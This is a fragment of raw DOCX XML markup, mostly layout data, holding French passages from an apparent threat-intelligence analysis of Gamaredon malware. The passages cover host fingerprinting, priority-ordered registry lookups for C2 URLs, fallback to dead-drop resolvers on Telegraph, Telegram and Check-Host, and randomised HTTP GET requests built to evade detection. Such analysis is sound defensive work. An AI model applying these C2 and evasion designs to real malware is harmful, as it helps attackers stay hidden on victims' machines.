              <wp:posOffset>3352809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4756149"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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756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756149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="47561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9504" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6658610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3346459</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4768849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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768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768849">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="47688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1552" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2082165</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1167139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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0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1167139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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6368" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3079115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3563629</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1395095" cy="3803650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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5095" cy="3803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5095" h="3803650">
                          <a:moveTo>
                            <a:pt x="146050" y="3803650"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="146050" y="3604260"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="590549" y="3604260"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="590549" y="3803650"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="145415" y="3604895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="591185" y="3604895"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="146050" y="3279140"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="146050" y="3079750"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="836929" y="3079750"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="836929" y="3279140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="145415" y="3080385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="837564" y="3080385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="146050" y="2754630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="146050" y="2555240"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="836929" y="2555240"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="836929" y="2754630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="145415" y="2555875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="837564" y="2555875"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130809" y="2230120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="130809" y="2030730"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="575310" y="2030730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="575310" y="2230120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130174" y="2031365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="575944" y="2031365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130809" y="1705610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="130809" y="1506219"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="821689" y="1506219"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="821689" y="1705610"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130174" y="1506855"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="822324" y="1506855"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130809" y="1181100"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="130809" y="981710"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1394459" y="981710"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1394459" y="1181100"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130174" y="982345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1395095" y="982345"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130809" y="656590"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="130809" y="457199"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="985519" y="457199"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="985519" y="656590"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="130174" y="457835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="986155" y="457835"/>
                          </a:lnTo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1017269" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101726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739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841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9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1"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Lors de son in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itialisation, le</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15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16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identifie l’hôte en récupérant la variable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046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1152748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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%COMPUTERNAME%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et le numéro de série en hexadécimal du disque système, ce qui permet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1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1349398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3652809" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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280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à Gamaredon d’identifier de manière unique les machines.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2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1624353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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utilise un mécanisme de basculement basé sur les priorités pour trouver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3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1797708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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serveur C2. Il parcourt une séquence spécifique de clés de registre afin de trouver une URL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1971063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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active. Si ces clés sont vides ou si la connexion échoue, il lance une phase de récupération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5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2144418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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à l’aide d’un DDR codé en dur. Il y a une pause de 1 à 3 secondes entre chaque requête,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6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2317773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4755601" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5560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code ne s’exécute pas en boucle ; il est conçu pour une exécution unique.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7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2592728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Le déroulement chronologique de l’exécution et les interactions correspondantes avec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8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2766083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2138880" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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88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registre sont détaillés ci-dessous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9680" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2753360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3357268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1744228" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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42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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Accè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u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">s à la clé de reg</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle07"/>
                            <w:spacing w:val="6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">istre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0704" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1751965</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3378223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="625993" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9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Source 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1728" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5404484</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3464583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="470304" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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3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2752" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>931544</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3464583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="524272" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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27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Priorité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3776" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3032760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3550943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3097530</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3549238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1082646" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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64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u w:val="single" w:color="000000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5824" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1650999</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3551578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="788445" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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844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Mécanisme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6848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3923688</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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Tenter une connexion au C2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7872" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4006438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852956" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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95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HistoryURL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8896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4008143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618246" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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Lecture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9920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4010048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0944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4010048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="943791" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7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Clé de registre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1968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4097043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="858574" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5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mis en cache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2992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4448198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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6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Tenter une connexion au C2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4016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4532653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618246" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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2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Lecture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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4530948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1261160" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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11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WindowsResponby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6064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4534558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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7088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4534558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="943791" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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7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Clé de registre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8112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4621553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="858574" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5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mis en cache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9136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4972708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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Tenter une connexion au C2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0160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5057163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618246" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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Lecture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1184" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5055458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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50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CloudURL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2208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5059068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="943791" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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7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Clé de registre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3232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5059068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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4256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5146063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="858574" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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5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mis en cache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0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5497218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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6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Tenter une connexion au C2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6304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5581673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618246" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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2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Lecture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7328" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5579968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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33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IpURL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8352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5583578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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9376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5583578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="943791" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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7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Clé de registre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0400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5670573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="858574" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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5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mis en cache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1424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6021728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082048" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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0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Récupérer les données, mettre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2448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6106183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="633333" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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Écriture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3472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3244215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6104478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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50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CloudURL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4496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6108088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0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6108088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1083352" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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335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DDR : Telegraph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6544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6195083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1743714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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3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à jour, envoyer une requête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7568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6546238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082048" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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0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Récupérer les données, mettre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8592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3244215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6628988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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50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CloudURL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9616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6630693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="633333" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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Écriture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0640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6632598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1044076" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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40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DDR : Telegram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1664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6632598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2688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6719593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1743714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3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à jour, envoyer une requête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3712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7070748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082048" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0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Récupérer les données, mettre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4736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7070748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1069393" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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93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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">DDR : Check-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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3244215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7153498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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33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IpURL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6784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7155203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="633333" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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Écriture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7808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7157108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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8832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7244103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="322920" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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9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Host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9856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7244103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1743714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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3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à jour, envoyer une requête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0880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7595258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2082683" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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26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Récupérer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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données,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1904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>925194</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7681618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113694" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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2928" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1496060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7681618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1044076" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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40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DDR : Telegram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3952" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2628265</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7681618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1184310" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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431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[Aucune clé écrite]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4976" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4617720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7768613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1316790" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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67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envoyer une requête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8359798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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Une fois qu'une URL C2 valide a été obtenue,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génère une requête HTTP GET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7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8533153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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conçue pour se fondre dans le trafic légitime en générant de manière dynamique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8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8706508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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endpoints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d'URL, des noms de fichiers et des extensions aléatoires. La structure de l'URL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9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8879863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2465359" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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35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ainsi obtenue se présente comme suit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009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112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214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0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31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0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419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0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54828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3947169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="349884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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3498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349884">
                          <a:moveTo>
                            <a:pt x="1324609" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1324609" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1324609" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1323974" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1323974" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1324609" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1324609" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1324609" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1323974" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1323974" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3498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08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3947169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="5726430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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57264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5726430">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5726430"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5723255"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="5723255"/>
                          </a:lnTo>
                          <a:moveTo>
